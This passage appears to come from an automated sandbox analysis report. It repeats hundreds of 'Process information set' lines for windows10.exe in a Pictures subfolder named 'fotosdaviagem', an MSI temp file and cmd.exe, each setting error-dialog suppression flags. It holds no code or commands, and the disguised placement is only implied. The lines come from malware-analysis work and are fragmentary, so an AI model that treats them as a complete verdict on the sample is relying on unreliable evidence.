            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
